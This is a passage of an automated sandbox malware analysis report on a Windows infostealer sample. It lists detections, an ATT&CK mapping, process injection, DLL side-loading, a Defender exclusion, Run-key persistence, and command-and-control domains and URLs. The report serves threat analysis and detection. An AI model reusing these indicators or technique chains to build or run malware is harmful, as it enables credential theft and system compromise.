        Source: Yara matchFile source: 00000019.00000002.865473652.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000002.827144868.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000019.00000001.796805895.0000000000400000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000002.916659708.00000000012A0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 3.1.Citvonvhciktufwvyzyhistnewdjgsoqdr.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 25.2.Citvon.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 27.2.Citvon.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.Citvonvhciktufwvyzyhistnewdjgsoqdr.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.1.Citvonvhciktufwvyzyhistnewdjgsoqdr.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.Citvonvhciktufwvyzyhistnewdjgsoqdr.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 25.2.Citvon.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 27.1.Citvon.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 27.2.Citvon.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 27.1.Citvon.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 25.1.Citvon.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 25.1.Citvon.exe.400000.0.raw.unpack, type: UNPACKEDPE

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid AccountsScripting1DLL Side-Loading11DLL Side-Loading11Disable or Modify Tools1OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default AccountsShared Modules1Registry Run Keys / Startup Folder1Process Injection612Deobfuscate/Decode Files or Information1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsPowerShell1Logon Script (Windows)Registry Run Keys / Startup Folder1Scripting1Security Account ManagerSystem Information Discovery123SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information3NTDSQuery Registry1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing11LSA SecretsSecurity Software Discovery251SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaLaunchdRc.commonRc.commonDLL Side-Loading11Cached Domain CredentialsProcess Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
        External Remote ServicesScheduled TaskStartup ItemsStartup ItemsFile Deletion1DCSyncVirtualization/Sandbox Evasion41Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobMasquerading231Proc FilesystemApplication Window Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
        Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Virtualization/Sandbox Evasion41/etc/passwd and /etc/shadowRemote System Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
        Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Process Injection612Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 411769 Sample: Citvonvhciktufwvyzyhistnewd... Startdate: 12/05/2021 Architecture: WINDOWS Score: 100 72 www.rest-blog.com 2->72 94 Found malware configuration 2->94 96 Malicious sample detected (through community Yara rule) 2->96 98 Multi AV Scanner detection for dropped file 2->98 100 5 other signatures 2->100 12 Citvon.exe 16 2->12         started        16 Citvonvhciktufwvyzyhistnewdjgsoqdr.exe 1 25 2->16         started        19 Citvon.exe 16 2->19         started        signatures3 process4 dnsIp5 74 xhtfga.dm.files.1drv.com 12->74 82 2 other IPs or domains 12->82 122 Multi AV Scanner detection for dropped file 12->122 124 Detected unpacking (changes PE section rights) 12->124 126 Machine Learning detection for dropped file 12->126 21 Citvon.exe 12->21         started        76 192.168.2.1 unknown unknown 16->76 78 xhtfga.dm.files.1drv.com 16->78 84 2 other IPs or domains 16->84 62 C:\Users\Public62etplwiz.exe, PE32+ 16->62 dropped 64 C:\Users\Public64ETUTILS.dll, PE32+ 16->64 dropped 66 C:\Users\Public\Citvon\Citvon.exe, PE32 16->66 dropped 128 Drops PE files to the user root directory 16->128 130 Tries to detect virtualization through RDTSC time measurements 16->130 132 Injects a PE file into a foreign processes 16->132 24 cmd.exe 1 16->24         started        26 Citvonvhciktufwvyzyhistnewdjgsoqdr.exe 16->26         started        80 xhtfga.dm.files.1drv.com 19->80 86 2 other IPs or domains 19->86 28 Citvon.exe 19->28         started        file6 signatures7 process8 signatures9 106 Modifies the context of a thread in another process (thread injection) 21->106 108 Maps a DLL or memory area into another process 21->108 110 Sample uses process hollowing technique 21->110 112 Queues an APC in another process (thread injection) 21->112 30 explorer.exe 21->30 injected 34 cmd.exe 5 24->34         started        37 conhost.exe 24->37         started        process10 dnsIp11 88 www.georgeswebwerks.com 30->88 90 www.thrg33.club 30->90 92 parkingpage.namecheap.com 198.54.117.212, 49779, 80 NAMECHEAP-NETUS United States 30->92 134 System process connects to network (likely due to code injection or exploit) 30->134 39 WWAHost.exe 30->39         started        42 msiexec.exe 30->42         started        44 autoconv.exe 30->44         started        46 autofmt.exe 30->46         started        68 C:\Windows \System3268etplwiz.exe, PE32+ 34->68 dropped 70 C:\Windows \System3270ETUTILS.dll, PE32+ 34->70 dropped 136 Drops executables to the windows directory (C:\Windows) and starts them 34->136 48 Netplwiz.exe 34->48         started        50 conhost.exe 34->50         started        file12 signatures13 process14 signatures15 114 Modifies the context of a thread in another process (thread injection) 39->114 116 Maps a DLL or memory area into another process 39->116 118 Tries to detect virtualization through RDTSC time measurements 39->118 52 cmd.exe 1 48->52         started        process16 signatures17 102 Suspicious powershell command line found 52->102 104 Adds a directory exclusion to Windows Defender 52->104 55 powershell.exe 27 52->55         started        58 conhost.exe 52->58         started        process18 signatures19 120 DLL side loading technique detected 55->120 60 conhost.exe 55->60         started        process20

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.

        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        Citvonvhciktufwvyzyhistnewdjgsoqdr.exe70%VirustotalBrowse
        Citvonvhciktufwvyzyhistnewdjgsoqdr.exe44%MetadefenderBrowse
        Citvonvhciktufwvyzyhistnewdjgsoqdr.exe66%ReversingLabsWin32.Infostealer.Fareit
        Citvonvhciktufwvyzyhistnewdjgsoqdr.exe100%Joe Sandbox ML

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Users\Public\Citvon\Citvon.exe100%Joe Sandbox ML
        C:\Users\Public\Citvon\Citvon.exe44%MetadefenderBrowse
        C:\Users\Public\Citvon\Citvon.exe66%ReversingLabsWin32.Infostealer.Fareit
        C:\Users\Public\NETUTILS.dll5%MetadefenderBrowse
        C:\Users\Public\NETUTILS.dll21%ReversingLabs
        C:\Users\Public\Netplwiz.exe0%MetadefenderBrowse
        C:\Users\Public\Netplwiz.exe0%ReversingLabs
        C:\Windows \System32\NETUTILS.dll5%MetadefenderBrowse
        C:\Windows \System32\NETUTILS.dll21%ReversingLabs

        Unpacked PE Files

        SourceDetectionScannerLabelLinkDownload
        25.2.Citvon.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
        3.2.Citvonvhciktufwvyzyhistnewdjgsoqdr.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
        3.1.Citvonvhciktufwvyzyhistnewdjgsoqdr.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
        27.2.Citvon.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
        27.1.Citvon.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
        25.1.Citvon.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

        Domains

        SourceDetectionScannerLabelLink
        www.rest-blog.com0%VirustotalBrowse
        www.georgeswebwerks.com0%VirustotalBrowse

        URLs

        SourceDetectionScannerLabelLink
        http://osoft.com/PKI/doefault.htm00%Avira URL Cloudsafe
        http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
        http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
        http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
        http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
        http://crl.microsof0%URL Reputationsafe
        http://crl.microsof0%URL Reputationsafe
        http://crl.microsof0%URL Reputationsafe
        http://crl.microsof0%URL Reputationsafe
        https://go.micro0%URL Reputationsafe
        https://go.micro0%URL Reputationsafe
        https://go.micro0%URL Reputationsafe
        https://go.micro0%URL Reputationsafe
        https://contoso.com/0%URL Reputationsafe
        https://contoso.com/0%URL Reputationsafe
        https://contoso.com/0%URL Reputationsafe
        https://contoso.com/0%URL Reputationsafe
        http://schemas.microsoft.coT0%Avira URL Cloudsafe
        https://contoso.com/License0%URL Reputationsafe
        https://contoso.com/License0%URL Reputationsafe
        https://contoso.com/License0%URL Reputationsafe
        https://contoso.com/Icon0%URL Reputationsafe
        https://contoso.com/Icon0%URL Reputationsafe
        https://contoso.com/Icon0%URL Reputationsafe
        http://mscrl.micro0%Avira URL Cloudsafe
        www.clinics.life/qku9/0%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        www.rest-blog.com
        		118.27.99.91
        		truefalseunknown
        parkingpage.namecheap.com
        		198.54.117.212
        		truefalse
          		high
          www.thrg33.club
          		unknown
          		unknowntrue
            		unknown
            www.georgeswebwerks.com
            		unknown
            		unknowntrueunknown
            onedrive.live.com
            		unknown
            		unknownfalse
              		high
              xhtfga.dm.files.1drv.com
              		unknown
              		unknownfalse
                		high

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                www.clinics.life/qku9/true
                • Avira URL Cloud: safe
                		low

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                https://xhtfga.dm.files.1drv.com/y4m8SMkzvpejvDLx8dnrECcyq_e2qmwA_A7cOWUQWdVRMq0yniUlzBSm_G1n5_On9Y_Citvon.exe, 00000011.00000003.736694886.000000000083E000.00000004.00000001.sdmp, Citvon.exe, 00000014.00000003.752669738.00000000008D0000.00000004.00000001.sdmpfalse
                  		high
                  http://nuget.org/NuGet.exepowershell.exe, 0000000D.00000002.749646155.00000172BA104000.00000004.00000001.sdmpfalse
                    		high
                    http://osoft.com/PKI/doefault.htm0powershell.exe, 0000000D.00000002.752441482.00000172C23D0000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000D.00000002.736725813.00000172AA2B1000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 0000000D.00000002.736959186.00000172AA43B000.00000004.00000001.sdmpfalse
                      		high
                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000D.00000002.736725813.00000172AA2B1000.00000004.00000001.sdmpfalse
                        		high
                        http://crl.microsofCitvon.exe, 00000014.00000003.752641816.00000000008C4000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        https://go.micropowershell.exe, 0000000D.00000003.711204031.00000172ABE21000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://schemas.xmlsoap.org/wsdl/powershell.exe, 0000000D.00000002.736959186.00000172AA43B000.00000004.00000001.sdmpfalse
                          		high
                          https://contoso.com/powershell.exe, 0000000D.00000002.749646155.00000172BA104000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          https://nuget.org/nuget.exepowershell.exe, 0000000D.00000002.749646155.00000172BA104000.00000004.00000001.sdmpfalse
                            		high
                            http://schemas.microsoft.coTpowershell.exe, 0000000D.00000002.752441482.00000172C23D0000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://contoso.com/Licensepowershell.exe, 0000000D.00000002.749646155.00000172BA104000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            https://contoso.com/Iconpowershell.exe, 0000000D.00000002.749646155.00000172BA104000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://mscrl.microCitvon.exe, 00000014.00000003.752641816.00000000008C4000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000D.00000002.735431704.00000172AA0A1000.00000004.00000001.sdmpfalse
                              		high
                              https://github.com/Pester/Pesterpowershell.exe, 0000000D.00000002.736725813.00000172AA2B1000.00000004.00000001.sdmpfalse
                                		high

                                Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public

                                IPDomainCountryFlagASNASN NameMalicious
                                198.54.117.212
                                		parkingpage.namecheap.comUnited States
                                		22612NAMECHEAP-NETUSfalse

                                Private

                                IP
                                192.168.2.1

                                General Information

                                Joe Sandbox Version:32.0.0 Black Diamond
                                Analysis ID:411769
                                Start date:12.05.2021
                                Start time:06:29:05
                                Joe Sandbox Product:CloudBasic
                                Overall analysis duration:0h 14m 20s
                                Hypervisor based Inspection enabled:false
                                Report type:light
                                Sample file name:Citvonvhciktufwvyzyhistnewdjgsoqdr.exe
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                Number of analysed new started processes analysed:33
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:1
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • HDC enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Detection:MAL
                                Classification:mal100.troj.evad.winEXE@29/18@9/2
                                EGA Information:Failed
                                HDC Information:
                                • Successful, ratio: 24.1% (good quality ratio 21.7%)
                                • Quality average: 66.5%
                                • Quality standard deviation: 33.7%
                                HCA Information:
                                • Successful, ratio: 86%
                                • Number of executed functions: 0
                                • Number of non-executed functions: 0
                                Cookbook Comments:
                                • Adjust boot time
                                • Enable AMSI
                                • Found application associated with file extension: .exe
                                Warnings:
                                Show All
                                • Excluded IPs from analysis (whitelisted): 104.43.193.48, 104.42.151.234, 13.107.42.13, 13.107.42.12, 20.82.210.154, 92.122.213.247, 92.122.213.194, 13.107.4.50, 52.155.217.156, 20.54.26.129
                                • Excluded domains from analysis (whitelisted): odc-web-brs.onedrive.akadns.net, odc-dm-files-geo.onedrive.akadns.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, l-0004.l-msedge.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, odwebpl.trafficmanager.net.l-0004.dc-msedge.net.l-0004.l-msedge.net, odc-dm-files.onedrive.akadns.net.l-0003.dc-msedge.net.l-0003.l-msedge.net, l-0003.l-msedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, elasticShed.au.au-msedge.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, odc-dm-files-brs.onedrive.akadns.net, odc-web-geo.onedrive.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, c-0001.c-msedge.net, afdap.au.au-msedge.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, au.au-msedge.net, blobcollector.events.data.trafficmanager.net, au.c-0001.c-msedge.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                • Report size exceeded maximum capacity and may have missing behavior information.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • Report size getting too big, too many NtSetInformationFile calls found.

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                06:29:54API Interceptor2x Sleep call for process: Citvonvhciktufwvyzyhistnewdjgsoqdr.exe modified
                                06:30:19AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Citvon C:\Users\Public\novtiC.url
                                06:30:21API Interceptor40x Sleep call for process: powershell.exe modified
                                06:30:27AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Citvon C:\Users\Public\novtiC.url
                                06:30:28API Interceptor4x Sleep call for process: Citvon.exe modified

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                198.54.117.212NAVTECO_R1_10_05_2021,pdf.exeGet hashmaliciousBrowse
                                • www.thenewyorker.computer/hw6d/?jFQ=Y1unV92ZJUSuuBS+wJtUBQ3HA2/A73jU4dZUG/XKFhicVa7REK6SIV0eE0B/9G03nb8G&2dcx=C48XLXUP5
                                Purchase Order-10764.exeGet hashmaliciousBrowse
                                • www.ironcitytools.com/nyr/?-ZeHzRH=vjemFc/5dnpE0iWg7/pwbrd8W/rgkb5zmACkGOoMfGa2hidfc+xoYJ21tnP7674Zx6pd+10POA==&2d=lnxh
                                w73FtMA4ZTl9NFm.exeGet hashmaliciousBrowse
                                • www.kompramania.com/blm/?v4=jT8U/4hmrcCGqX5zF6RLU3xaP16cys1ENKtgh6K33uf7HOVcxmeLoGjIinA45QceqzYG68+/fQ==&Jr=V48DzvNH
                                MRQUolkoK7.exeGet hashmaliciousBrowse
                                • www.blazerplanning.com/8u3b/?o2=iN68aFPHs&9rwxC4Lh=JlLpmPAzMmQyvHQwr5UMVliwPWakpnfQ1/iZiKdXRC0gvSv7c7ocKU7ECD3d27LqzKr0tNAMaQ==
                                Bank Details.xlsxGet hashmaliciousBrowse
                                • www.thesixteenthround.net/aqu2/?NP=s0A+R2zuZA1+LPHAc9M/AmUzyN8aP2GBLv9J4fG53S1jdbvs3uSd9usyNyOEpwpEqUbLdg==&Yzrt=nN6d4T
                                New order.exeGet hashmaliciousBrowse
                                • www.milestonesrls.online/n30n/?GdIH=4/VSTdRgjoHrn+qSdMCKVXShlJLaSm84jLgodp9buoZ+qe3slXHJ+FG3aXuYEDG1TdkG&Ajn=6lNDphQHVxzXvzn0
                                Shinshin Machinery.exe.exeGet hashmaliciousBrowse
                                • www.bakoroast.coffee/g7b/?Bzu=X+rBV3VeTRPsG/IiwPgAjJR7FEhfgRdscRWTA3Iua2yUCn27Cctf8aE4Tun6k6kIXyXe&Rxo=M6hD4jnx_05t
                                INV-210318L.exeGet hashmaliciousBrowse
                                • www.owe.pink/vsk9/?EvI=CR-0dB&YV805PL=lPye3ad5VliS0kw2YotKykUI/f06ulyVlr48O2QWPrzqY2uuE1iv1/UVrBfqkmRpTwF2mwsV5g==
                                1LHKlbcoW3.exeGet hashmaliciousBrowse
                                • www.boogerstv.com/p2io/?rN=d8VD7828W8N&CR=fW2NkW2j278wyrs6d/m+egXTc5dWq8qtohQAL+tQrXSmfdetyJ3HBVVg7gxb9s6RBL4M
                                PO# 4510175687.exeGet hashmaliciousBrowse
                                • www.owe.pink/vsk9/?I6A=lPye3ad5VliS0kw2YotKykUI/f06ulyVlr48O2QWPrzqY2uuE1iv1/UVrCzQnn9SQHkn&ofutZl=xVMtGJhp
                                LrJiu5vv1t.exeGet hashmaliciousBrowse
                                • www.ifdca.com/m0rc/?9rspeh=lbR5C4q/Bs6c3SKeepmv0Da9hIgPOrZf3Ut381rRSdXn0224bmGUGa2i5otESCz2qCMY&Ppd=_6g8CdsPd2MHu
                                1nmYiiE0nY.exeGet hashmaliciousBrowse
                                • www.toplevelsealcoating.net/njo/?CZ=8pBxZbI&w2=mxuHlFV7ZpSkuYg6Lcwsp6DcsuxeedOYcKnp3vLhruQtfiblvIYsgHAA5V0E6fjYQA2BXcpyvw==
                                KK7wD2vDmF.exeGet hashmaliciousBrowse
                                • www.toplevelsealcoating.net/njo/?nRYxC8=mxuHlFV7ZpSkuYg6Lcwsp6DcsuxeedOYcKnp3vLhruQtfiblvIYsgHAA5WYUmu/jX1fQ&Lh38=ZTdtG87X0j
                                PO 213409701.xlsxGet hashmaliciousBrowse
                                • www.304shaughnessygreen.info/oean/?rFQt=d8/ljYFal4PMYfvauWUnApMkbVV7hvzPIdajggbW2e5rOGYmCrO1nFh35A2MgOnQN9VHwA==&rF=9rbPKz
                                SAMSUNG C&T UPCOMING PROJECTS19-MP.exe.exeGet hashmaliciousBrowse
                                • www.marcellelizabeth.life/cdl/?Mfg=M/zpEzS8W9oCfIylLsSUMmJUovgo5PqMMB6b2NznY4m/oZHGIJjoAjEmtsxcvBVMY/Td&uVxpj=ojO0dJYX1B
                                KROS Sp. z.o.o.exeGet hashmaliciousBrowse
                                • www.angermgmtathome.com/kio8/?9rj0DvY=e6NOpdhu6GIIdtRIIRGR8dBI9mtGur58S+UqNMdGsY3OVbM2U6HgcHgaHwr7dyfFZUjr&v4=Ch6Lm
                                SAMSUNG C&T UPCOMING PROJECTS19-027-MP-010203.exe.exeGet hashmaliciousBrowse
                                • www.marcellelizabeth.life/cdl/?Et08qv=M/zpEzS8W9oCfIylLsSUMmJUovgo5PqMMB6b2NznY4m/oZHGIJjoAjEmtsxcvBVMY/Td&uXK=hpgd6NmPQLRDNXK
                                IMG_1107.EXEGet hashmaliciousBrowse
                                • www.inifinityapps.net/bf3/?DXOX-=swuzFfgzYDLB3Bi4piS9eAlbkrlhpvPYJEwernceI/wmg54lN6WJu/MxY2tI0Dh/A+Qh&KzuH=XPjDi0j0G
                                Bank details.exeGet hashmaliciousBrowse
                                • www.nuevasantatecla.com/ehxh/?DVBh=2SjzOZmHZnnKS6lUkurSin0GpOD0orQTIR1dgfvJrCJBvqRU2lp5oKty/puKetsuF8gN&1b0hlT=gvRpjb_Xgb6xvP
                                in.exeGet hashmaliciousBrowse
                                • www.seak.xyz/uds2/?Y4spQFW=vIE1ET6pQu49m+QHY7YrZ7t2bRuoKngw2h26Ua5bu/NnC6rxsHDfr4DpunyQx1XamxAZm7X6xg==&Ezu=VTChCL_ht2spUrI

                                Domains

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                parkingpage.namecheap.comNAVTECO_R1_10_05_2021,pdf.exeGet hashmaliciousBrowse
                                • 198.54.117.212
                                POI09876OIUY.exeGet hashmaliciousBrowse
                                • 198.54.117.210
                                EDS03932,pdf.exeGet hashmaliciousBrowse
                                • 198.54.117.216
                                Purchase Order.exeGet hashmaliciousBrowse
                                • 198.54.117.216
                                slot Charges.exeGet hashmaliciousBrowse
                                • 198.54.117.216
                                PO09641.exeGet hashmaliciousBrowse
                                • 198.54.117.215
                                BORMAR SA_Cotizaci#U00f3n de producto doc.exeGet hashmaliciousBrowse
                                • 198.54.117.211
                                Purchase Order-10764.exeGet hashmaliciousBrowse
                                • 198.54.117.212
                                4LkSpeVqKR.exeGet hashmaliciousBrowse
                                • 198.54.117.218
                                2B0CsHzr8o.exeGet hashmaliciousBrowse
                                • 198.54.117.216
                                60b88477_by_Libranalysis.exeGet hashmaliciousBrowse
                                • 198.54.117.215
                                DHL Receipt_AWB811470484778.exeGet hashmaliciousBrowse
                                • 198.54.117.217
                                NEW ORDER.exeGet hashmaliciousBrowse
                                • 198.54.117.217
                                0876543123.exeGet hashmaliciousBrowse
                                • 198.54.117.210
                                g1EhgmCqCD.exeGet hashmaliciousBrowse
                                • 198.54.117.216
                                Payment.xlsxGet hashmaliciousBrowse
                                • 198.54.117.210
                                w73FtMA4ZTl9NFm.exeGet hashmaliciousBrowse
                                • 198.54.117.212
                                Remittance Advice pdf.exeGet hashmaliciousBrowse
                                • 198.54.117.212
                                d801e424_by_Libranalysis.docxGet hashmaliciousBrowse
                                • 198.54.117.218
                                MRQUolkoK7.exeGet hashmaliciousBrowse
                                • 198.54.117.212

                                ASN

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                NAMECHEAP-NETUSUpdated Order list -804333.exeGet hashmaliciousBrowse
                                • 198.54.115.56
                                NAVTECO_R1_10_05_2021,pdf.exeGet hashmaliciousBrowse
                                • 198.54.117.212
                                BELLOW FABRICATION Dwg.exeGet hashmaliciousBrowse
                                • 199.188.200.15
                                file.exeGet hashmaliciousBrowse
                                • 198.54.115.133
                                scan of document 5336227.xlsmGet hashmaliciousBrowse
                                • 162.0.233.152
                                vy38Kw9qRh.exeGet hashmaliciousBrowse
                                • 198.54.122.60
                                copy of order 9119.xlsmGet hashmaliciousBrowse
                                • 162.0.233.152
                                generated payment 330070.xlsmGet hashmaliciousBrowse
                                • 162.0.233.152
                                scan of bill 0905.xlsmGet hashmaliciousBrowse
                                • 162.0.233.152
                                ProForma Invoice 20210510.exeGet hashmaliciousBrowse
                                • 162.0.229.247
                                ePj6KfzLBxh4vbe.exeGet hashmaliciousBrowse
                                • 198.54.122.60
                                zkXpISzeo3.exeGet hashmaliciousBrowse
                                • 198.54.122.60
                                PI-ARKEMIX HMX20210511_pdf.exeGet hashmaliciousBrowse
                                • 198.54.115.133
                                specifications.exeGet hashmaliciousBrowse
                                • 198.54.126.165
                                yl9KgwwOXDZoGMw.exeGet hashmaliciousBrowse
                                • 198.54.122.60
                                cargo details.exeGet hashmaliciousBrowse
                                • 198.54.126.165
                                Import shipment.exeGet hashmaliciousBrowse
                                • 198.54.126.165
                                8DL3LHg4SB6Q7z2.exeGet hashmaliciousBrowse
                                • 198.54.122.60
                                Baw29sc72T.exeGet hashmaliciousBrowse
                                • 199.193.7.228
                                Purchase Order.exeGet hashmaliciousBrowse
                                • 198.54.117.216

                                JA3 Fingerprints

                                No context

                                Dropped Files

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                C:\Users\Public\NETUTILS.dll21edfbb7_by_Libranalysis.exeGet hashmaliciousBrowse
                                  Waybill Document 22700456.exeGet hashmaliciousBrowse
                                    Give Offer CVE6535 _TVOP-MIO, pdf.exeGet hashmaliciousBrowse
                                      aFMnf1WQEQ.exeGet hashmaliciousBrowse
                                        1RsYL7DWnf.exeGet hashmaliciousBrowse
                                          5a96079f_by_Libranalysis.exeGet hashmaliciousBrowse
                                            SOA May.xltGet hashmaliciousBrowse
                                              SecuriteInfo.com.Mal.Generic-S.21221.exeGet hashmaliciousBrowse
                                                RFQ-00205-0305.exeGet hashmaliciousBrowse
                                                  Almadeena-Bakery-005445536555665445.scr.exeGet hashmaliciousBrowse
                                                    Ygqayrvpsvjdxblkzsmxymjfnxukvrdvft_Signed_.exeGet hashmaliciousBrowse
                                                      To1sRo1E8P.exeGet hashmaliciousBrowse
                                                        wNgiGmsOwT.exeGet hashmaliciousBrowse
                                                          BhTxt5BUvy.exeGet hashmaliciousBrowse
                                                            Payment.exeGet hashmaliciousBrowse
                                                              Urgente RFQ_AP65425652_032421,pdf.exeGet hashmaliciousBrowse
                                                                Swift.exeGet hashmaliciousBrowse
                                                                  Kemmler-New order requirement 90901U,pdf.exeGet hashmaliciousBrowse
                                                                    __RFQAP65425652032421_pdf.exeGet hashmaliciousBrowse
                                                                      docs-00425.exeGet hashmaliciousBrowse

                                                                        Created / dropped Files

